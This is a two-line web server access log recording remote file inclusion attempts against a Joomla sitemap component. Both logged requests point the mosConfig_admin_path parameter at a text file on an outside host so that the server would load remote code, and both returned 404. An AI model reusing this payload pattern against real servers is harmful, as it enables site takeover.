218.38.16.181 - - [20/Dec/2009:22:41:09 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.16.181 - - [20/Dec/2009:22:41:09 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
